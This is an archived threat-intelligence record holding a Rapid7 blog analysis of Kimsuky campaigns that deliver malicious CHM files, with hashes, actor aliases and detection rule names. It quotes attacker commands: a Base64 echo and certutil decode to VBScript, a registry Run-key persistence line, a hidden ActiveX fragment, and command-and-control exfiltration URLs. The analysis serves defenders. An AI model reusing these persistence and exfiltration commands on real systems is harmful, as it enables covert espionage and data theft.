{ "id": "e07dfdd4-a684-4283-9dcd-82766aa7b79a", "created_at": "2026-04-06T00:21:45.077305Z", "updated_at": "2026-04-10T13:12:44.239873Z", "deleted_at": null, "sha1_hash": "02b2b5a5ba770ab4e41775d8be3ab57aae0bafc2", "title": "The Updated APT Playbook: Tales from the Kimsuky threat actor group | Rapid7 Blog", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 4990496, "plain_text": "The Updated APT Playbook: Tales from the Kimsuky threat actor\r\ngroup | Rapid7 Blog\r\nBy Rapid7\r\nPublished: 2024-03-20 · Archived: 2026-04-05 14:55:55 UTC\r\nCo-authors are Christiaan Beek and Raj Samani\r\nWithin Rapid7 Labs we continually track and monitor threat groups. This is one of our key areas of focus as we\r\nwork to ensure that our ability to protect customers remains constant. As part of this process, we routinely identify\r\nevolving tactics from threat groups in what is an unceasing game of cat and mouse.\r\nOur team recently ran across some interesting activity that we believe is the work of the Kimsuky threat actor\r\ngroup, also known as Black Banshee or Thallium. Originating from North Korea and active since at least 2012,\r\nKimsuky focuses primarily on intelligence gathering. The group is known to have targeted South Korean\r\ngovernment entities, individuals associated with the Korean peninsula's unification process, and global experts in\r\nvarious fields relevant to the regime's interests. In recent years, Kimsuky’s activity has also expanded across the\r\nAPAC region to impact Japan, Vietnam, Thailand, etc.\r\nThrough our research, we saw an updated playbook that underscores Kimsuky’s efforts to bypass modern security\r\nmeasures. Their evolution in tactics, techniques, and procedures (TTPs) underscores the dynamic nature of cyber\r\nespionage and the continuous arms race between threat actors and defenders.\r\nIn this blog we will detail new techniques that we have observed used by this actor group over the recent months.\r\nWe believe that sharing these evolving techniques gives defenders the latest insights into measures required to\r\nprotect their assets.\r\nAnatomy of the Attack\r\nLet’s begin by highlighting where we started our analysis of Kimsuky and how the more we investigated, the more\r\nwe discovered — to the point where we believe we observed a new wave of attacks by this actor.\r\nFollowing the identification of the target, typically we would anticipate the reconnaissance phase to initiate in an\r\neffort to identify methods to allow access into the target. Since Kimsuky’s focus is intelligence gathering, gaining\r\naccess needs to remain undetected; subsequently, the intrusion is intended to not trigger alerts.\r\nOver the years, we have observed a change in this group’s methods, starting with weaponized Office documents,\r\nISO files, and beginning last year, the abuse of shortcut files (LNK files). By disguising these LNK files as benign\r\ndocuments or files, attackers trick users into executing them. PowerShell commands, or even full binaries, are\r\nhidden in the LNK files — all hidden for the end-user who doesn’t detect this at the surface.\r\nOur latest findings lead us to observations that we believe are Kimsuky using CHM files which are delivered in\r\nseveral ways, as part of an ISO|VHD|ZIP or RAR file. The reason they would use this approach is that such\r\nhttps://www.rapid7.com/blog/post/2024/03/20/the-updated-apt-playbook-tales-from-the-kimsuky-threat-actor-group/\r\nPage 1 of 14\n\ncontainers have the ability to pass the first line of defense and then the CHM file will be executed.\r\nCHM files, or Compiled HTML Help files, are a proprietary format for online help files developed by Microsoft.\r\nThey contain a collection of HTML pages and a table of contents, index, and full text search capability.\r\nEssentially, CHM files are used to display help documentation in a structured, navigable format. They are\r\ncompiled using the Microsoft HTML Help Workshop and can include text, images, and hyperlinks, similar to web\r\npages, but are packaged as a single compressed file with a .chm extension.\r\nWhile originally designed for help documentation, CHM files have also been exploited for malicious purposes,\r\nsuch as distributing malware, because they can execute JavaScript when opened. CHM files are a small archive\r\nthat can be extracted with unzipping tools to extract the content of the CHM file for analysis.\r\nThe first scenario in our analysis can be visualized as follows:\r\nThe Nuclear Lure\r\nWhile tracking activity, we first discovered a CHM file that triggered our attention.\r\nHash Value\r\nMD5 364d4fdf430477222fe854b3cd5b6d40\r\nSHA1 b5224224fdbabdea53a91a96e9f816c6f9a8708c\r\nSHA256 c62677543eeb50e0def44fc75009a7748cdbedd0a3ccf62f50d7f219f6a5aa05\r\nAnalyzing this file in a controlled environment, we observe that the CHM file contains the following files and\r\nstructure:\r\nhttps://www.rapid7.com/blog/post/2024/03/20/the-updated-apt-playbook-tales-from-the-kimsuky-threat-actor-group/\r\nPage 2 of 14\n\nThe language of the filenames is Korean. With the help of translation software, here are the file names:\r\nNorth Korea's nuclear strategy revealed in 'Legalization of Nuclear Forces'.html\r\nIncomplete.html\r\nFactors and types of North Korea’s use of nuclear weapons.html\r\nNorth Korean nuclear crisis escalation model and determinants of nuclear use.html\r\nIntroduction.html\r\nPrevious research review.html\r\nResearch background and purpose.html\r\nThese HTML files are linked towards the main HTML file ‘home.html’ — we will return later to this file.\r\nEach filetype has its unique characteristics, and from the area of file forensics let’s have a look at the header of the\r\nfile:\r\nValue Value Comment\r\n0x49545346 ITSF File header ID for CHM files\r\n0x03 3 Version Number\r\n--- --- ---\r\nskip\r\nhttps://www.rapid7.com/blog/post/2024/03/20/the-updated-apt-playbook-tales-from-the-kimsuky-threat-actor-group/\r\nPage 3 of 14\n\nValue Value Comment\r\n--- --- ---\r\n0x1204 0412 Windows Language ID\r\n--- --- ---\r\nThe value 0412 as a language ID is “Korean - Korea”. This can be translated to mean the Windows operating\r\nsystem that was used to create this CHM file was using the Korean language.\r\nWhen the CHM file is executed, it will showcase the following:\r\nThe page in the right pane is the ‘home.html’ file. This page contains an interesting piece of code:\r\nhttps://www.rapid7.com/blog/post/2024/03/20/the-updated-apt-playbook-tales-from-the-kimsuky-threat-actor-group/\r\nPage 4 of 14\n\nThe provided code snippet is an example of using HTML and ActiveX to execute arbitrary commands on a\r\nWindows machine, typically for malicious purposes. The value assigned to a ‘Button’ contains a command line\r\nwith Base64 code in it as another obfuscation technique and is followed by a living-off-the-land technique,\r\nthereby creating persistence on the victim’s system to run the content.\r\nLet’s break it up and understand what the actor is doing:\r\n1. Base64 Encoded VBScript Execution (T1059.003):\r\necho T24gRXJyb3IgUmVzdW1lIE5leHQ...: This part echoes a Base64-encoded string into a file. The\r\nstring, when decoded, is VBScript code. The VBScript is designed to be executed on the victim's machine.\r\nThe decoded Base64 value is:\r\n2. Saving to a .dat File:\r\n\u003e\"%USERPROFILE%\\Links\\MXFhejJ3c3gzZWRjA.dat\": The echoed Base64 string is redirected and\r\nsaved into a .dat file within the current user's Links directory. The filename seems randomly generated or\r\nobfuscated to avoid easy detection.\r\n3. Decoding the .dat File:\r\nhttps://www.rapid7.com/blog/post/2024/03/20/the-updated-apt-playbook-tales-from-the-kimsuky-threat-actor-group/\r\nPage 5 of 14\n\nstart /MIN certutil -decode \"%USERPROFILE%\\Links\\MXFhejJ3c3gzZWRjA.dat\"\r\n\"%USERPROFILE%\\Links\\MXFhejJ3c3gzZWRjA.vbs\": This uses the certutil utility, a legitimate\r\nWindows tool, to decode the Base64-encoded .dat file back into a .vbs (VBScript) file. The /MIN flag starts\r\nthe process minimized to reduce suspicion.\r\n4. Persistence via Registry Modification (T1547.001)\r\n:start /MIN REG ADD HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /v Document /t\r\nREG_SZ /d \"%USERPROFILE%\\Links\\MXFhejJ3c3gzZWRjA.vbs\" /f: This adds a new entry to the\r\nWindows Registry under the Run key for the current user (HKCU stands for HKEY_CURRENT_USER).\r\nThis registry path is used by Windows to determine which programs should run automatically at startup.\r\nThe command ensures that the decoded VBScript runs every time the user logs in, achieving persistence on\r\nthe infected system.\r\nBut what is downloaded from the URL, decoded and written to that VBS file? The URL of the Command and\r\nControl Server is hosting an HTML page that contains VBS code:\r\nAnalyzing the code, it does several things on the victim’s machine:\r\nThe function ‘SyInf()’ collects basic system information using WMI (Windows Management Instrumentation) and\r\nconstructs a string with all these details. What is gathered:\r\nComputer name, owner, manufacturer, model, system type.\r\nOperating system details, version, build number, total visible memory.\r\nProcessor details, including caption and clock speed.\r\nhttps://www.rapid7.com/blog/post/2024/03/20/the-updated-apt-playbook-tales-from-the-kimsuky-threat-actor-group/\r\nPage 6 of 14\n\nOther functions in the code collect the running processes on the system, recent Word files, and lists directories and\r\nfiles of specific folders. In our case, the actor was interested in the content of the Downloads folder.\r\nAfter gathering the requested information from the code, it is all encoded in the Base64 format, stored in the file\r\n‘info.txt’ and exfiltrated to the remote server:\r\nui = \"00701111.000webhostapp.com/wp-extra\"\r\nOnce the information is sent, the C2 responds with the following message:\r\nThis C2 server is still active and while we have seen activity since September 2023, we also observed activity in\r\n2024.\r\nNew Campaign Discovered\r\nPivoting some of the unique strings in the ‘stealer code’ and hunting for more CHM files, we discovered more\r\nfiles — some also going back to H2 2023, but also 2024 hits.\r\nIn VirusTotal we discovered the following file:\r\nHash Value\r\nMD5 71db2ae9c36403cec1fd38864d64f239\r\nSHA1 5c7b2705155023e6e438399d895d30bf924e0547\r\nSHA256 e8000ddfddbe120b5f2fb3677abbad901615d1abd01a0de204fade5d2dd5ad0d\r\n------------- -------------------\r\nThe file is a VBS script and it contains similar code to what we described earlier on the information gathering\r\nscript above. Many components are the same, with small differences in what type of data is being gathered.\r\nThe biggest difference, which makes sense, is a different C2 server. Below is the full path of when the VBS script\r\nran and concatenated the path:\r\nhxxp://gosiweb.gosiclass[.]com/m/gnu/convert/html/com/list.php?query=6\r\nThe modus operandi and reusing of code and tools are showing that the threat actor is actively using and\r\nrefining/reshaping its techniques and tactics to gather intelligence from victims.\r\nStill More? Yes, Another Approach Discovered\r\nhttps://www.rapid7.com/blog/post/2024/03/20/the-updated-apt-playbook-tales-from-the-kimsuky-threat-actor-group/\r\nPage 7 of 14\n\nUsing the characteristics of the earlier discovered CHM files, we developed internal Yara rules that were hunting,\r\nfrom which we discovered the following CHM file:\r\nHash Value\r\nMD5 f35b05779e9538cec363ca37ab38e287\r\nSHA1 d4fa57f9c9e35222a8cacddc79055c1d76907fb9\r\nSHA256 da79eea1198a1a10e2ffd50fd949521632d8f252fb1aadb57a45218482b9fd89\r\n---- ---\r\nIn this particular case, multiple .bat files and VBS scripts are present:\r\nIn similar fashion, an HTML file in the directory contains hidden code:\r\nhttps://www.rapid7.com/blog/post/2024/03/20/the-updated-apt-playbook-tales-from-the-kimsuky-threat-actor-group/\r\nPage 8 of 14\n\nstyle=\"visibility:hidden;\"\u003e\u003cparam name=\"Command\" value=\"ShortCut\"\u003e\u003cparam name=\"Button\"\r\nvalue=\"Bitmap:shortcut\"\u003e\u003cparam name=\"Item1\" value=\",hh,-decompile C:\\\\Users\\\\Public\\\\Libraries '+d+'\r\nThe background png file shows (translated) the following information:\r\nhttps://www.rapid7.com/blog/post/2024/03/20/the-updated-apt-playbook-tales-from-the-kimsuky-threat-actor-group/\r\nPage 9 of 14\n\nhttps://www.rapid7.com/blog/post/2024/03/20/the-updated-apt-playbook-tales-from-the-kimsuky-threat-actor-group/\r\nPage 10 of 14\n\nOnce the CHM file is executed, it drops all files in the C:\\\\Users\\\\Public\\\\Libraries\\ directory and starts running. It\r\nstarts with creating a persistence scheduled task with the “\\2034923.bat” file:\r\nThe VBS script will create a Service and then the other .bat files are executed, each with different functions.\r\nThe “9583423.bat” script will gather information from the system and store them in text files:\r\nIn the above code, when information is gathered, the file is called by the ‘1295049.bat’ script, which contains the\r\nPowershell code to setup the connection to the C2 server with the right path, Base64 encode the stream, and\r\ntransfer:\r\nhttps://www.rapid7.com/blog/post/2024/03/20/the-updated-apt-playbook-tales-from-the-kimsuky-threat-actor-group/\r\nPage 11 of 14\n\nCombining the code from previous .bat file and this code, the path to the C2 is created:\r\nhxxps://niscarea[.]com/in.php?cn=[base64]\u0026fn=[DateTime]\r\nThe gathered files containing the information about the system will be Base64 encoded, zipped and sent to the C2.\r\nAfter sending, the files are deleted from the local system.\r\nhttps://www.rapid7.com/blog/post/2024/03/20/the-updated-apt-playbook-tales-from-the-kimsuky-threat-actor-group/\r\nPage 12 of 14\n\nThe sys.txt file will contain information about the system of the victim such as OS, CPU architecture, etc. Here is\r\na short example of the content:\r\nThe overall flow of this attack can be simplified in this visualization:\r\nAttack Prevalence\r\nSince this is an active campaign, tracking prevalence is based at the time of this writing. However, Rapid7 Labs\r\ntelemetry enables us to confirm that we have identified targeted attacks against entities based in South Korea.\r\nMoreover, as we apply our approach to determine attribution such as the overlap in code and tactics, we have\r\nattributed this campaign with a moderate confidence* to the Kimsuky group.\r\nAll IoCs are available freely within our Rapid7 Labs repository here.\r\nRapid7 Customers\r\nhttps://www.rapid7.com/blog/post/2024/03/20/the-updated-apt-playbook-tales-from-the-kimsuky-threat-actor-group/\r\nPage 13 of 14\n\nInsightIDR and Managed Detection and Response (MDR) customers have existing detection coverage through\r\nRapid7's expansive library of detection rules. Rapid7 recommends installing the Insight Agent on all applicable\r\nhosts to ensure visibility into suspicious processes and proper detection coverage. Below is a non-exhaustive list\r\nof detections deployed and alerting on activity related to these techniques and research:\r\nPersistence - Run Key Added by Reg.exe\r\nSuspicious Process - HH.exe Spawns Child Process\r\nSuspicious Process - CHM File Runs CMD.exe to Run Certutil\r\nPersistence - vbs Script Added to Registry Run Key\r\n*In threat research terms, “moderate confidence” means that we have a significant amount of evidence that the\r\nactivity we are observing is similar to what we have observed from a specific group or actor in the past; however,\r\nthere is always a chance someone is mimicking behavior. Hence, we use “moderate” instead of “high”\r\nconfidence.\r\nSource: https://www.rapid7.com/blog/post/2024/03/20/the-updated-apt-playbook-tales-from-the-kimsuky-threat-actor-group/\r\nhttps://www.rapid7.com/blog/post/2024/03/20/the-updated-apt-playbook-tales-from-the-kimsuky-threat-actor-group/\r\nPage 14 of 14", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA" ], "origins": [ "web" ], "references": [ "https://www.rapid7.com/blog/post/2024/03/20/the-updated-apt-playbook-tales-from-the-kimsuky-threat-actor-group/" ], "report_names": [ "the-updated-apt-playbook-tales-from-the-kimsuky-threat-actor-group" ], "threat_actors": [ { "id": "d90307b6-14a9-4d0b-9156-89e453d6eb13", "created_at": "2022-10-25T16:07:23.773944Z", "updated_at": "2026-04-10T02:00:04.746188Z", "deleted_at": null, "main_name": "Lead", "aliases": [ "Casper", "TG-3279" ], "source_name": "ETDA:Lead", "tools": [ "Agentemis", "BleDoor", "Cobalt Strike", "CobaltStrike", "RbDoor", "RibDoor", "Winnti", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "191d7f9a-8c3c-442a-9f13-debe259d4cc2", "created_at": "2022-10-25T15:50:23.280374Z", "updated_at": "2026-04-10T02:00:05.305572Z", "deleted_at": null, "main_name": "Kimsuky", "aliases": [ "Kimsuky", "Black Banshee", "Velvet Chollima", "Emerald Sleet", "THALLIUM", "APT43", "TA427", "Springtail" ], "source_name": "MITRE:Kimsuky", "tools": [ "Troll Stealer", "schtasks", "Amadey", "GoBear", "Brave Prince", "CSPY Downloader", "gh0st RAT", "AppleSeed", "Gomir", "NOKKI", "QuasarRAT", "Gold Dragon", "PsExec", "KGH_SPY", "Mimikatz", "BabyShark", "TRANSLATEXT" ], "source_id": "MITRE", "reports": null }, { "id": "760f2827-1718-4eed-8234-4027c1346145", "created_at": "2023-01-06T13:46:38.670947Z", "updated_at": "2026-04-10T02:00:03.062424Z", "deleted_at": null, "main_name": "Kimsuky", "aliases": [ "G0086", "Emerald Sleet", "THALLIUM", "Springtail", "Sparkling Pisces", "Thallium", "Operation Stolen Pencil", "APT43", "Velvet Chollima", "Black Banshee" ], "source_name": "MISPGALAXY:Kimsuky", "tools": [ "xrat", "QUASARRAT", "RDP Wrapper", "TightVNC", "BabyShark", "RevClient" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "c8bf82a7-6887-4d46-ad70-4498b67d4c1d", "created_at": "2025-08-07T02:03:25.101147Z", "updated_at": "2026-04-10T02:00:03.846812Z", "deleted_at": null, "main_name": "NICKEL KIMBALL", "aliases": [ "APT43 ", "ARCHIPELAGO ", "Black Banshee ", "Crooked Pisces ", "Emerald Sleet ", "ITG16 ", "Kimsuky ", "Larva-24005 ", "Opal Sleet ", "Ruby Sleet ", "SharpTongue ", "Sparking Pisces ", "Springtail ", "TA406 ", "TA427 ", "THALLIUM ", "UAT-5394 ", "Velvet Chollima " ], "source_name": "Secureworks:NICKEL KIMBALL", "tools": [ "BabyShark", "FastFire", "FastSpy", "FireViewer", "Konni" ], "source_id": "Secureworks", "reports": null }, { "id": "71a1e16c-3ba6-4193-be62-be53527817bc", "created_at": "2022-10-25T16:07:23.753455Z", "updated_at": "2026-04-10T02:00:04.73769Z", "deleted_at": null, "main_name": "Kimsuky", "aliases": [ "APT 43", "Black Banshee", "Emerald Sleet", "G0086", "G0094", "ITG16", "KTA082", "Kimsuky", "Larva-24005", "Larva-25004", "Operation Baby Coin", "Operation Covert Stalker", "Operation DEEP#DRIVE", "Operation DEEP#GOSU", "Operation Kabar Cobra", "Operation Mystery Baby", "Operation Red Salt", "Operation Smoke Screen", "Operation Stealth Power", "Operation Stolen Pencil", "SharpTongue", "Sparkling Pisces", "Springtail", "TA406", "TA427", "Thallium", "UAT-5394", "Velvet Chollima" ], "source_name": "ETDA:Kimsuky", "tools": [ "AngryRebel", "AppleSeed", "BITTERSWEET", "BabyShark", "BoBoStealer", "CSPY Downloader", "Farfli", "FlowerPower", "Gh0st RAT", "Ghost RAT", "Gold Dragon", "GoldDragon", "GoldStamp", "JamBog", "KGH Spyware Suite", "KGH_SPY", "KPortScan", "KimJongRAT", "Kimsuky", "LATEOP", "LOLBAS", "LOLBins", "Living off the Land", "Lovexxx", "MailPassView", "Mechanical", "Mimikatz", "MoonPeak", "Moudour", "MyDogs", "Mydoor", "Network Password Recovery", "PCRat", "ProcDump", "PsExec", "ReconShark", "Remote Desktop PassView", "SHARPEXT", "SWEETDROP", "SmallTiger", "SniffPass", "TODDLERSHARK", "TRANSLATEXT", "Troll Stealer", "TrollAgent", "VENOMBITE", "WebBrowserPassView", "xRAT" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434905, "ts_updated_at": 1775826764, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/02b2b5a5ba770ab4e41775d8be3ab57aae0bafc2.pdf", "text": "https://archive.orkl.eu/02b2b5a5ba770ab4e41775d8be3ab57aae0bafc2.txt", "img": "https://archive.orkl.eu/02b2b5a5ba770ab4e41775d8be3ab57aae0bafc2.jpg" } }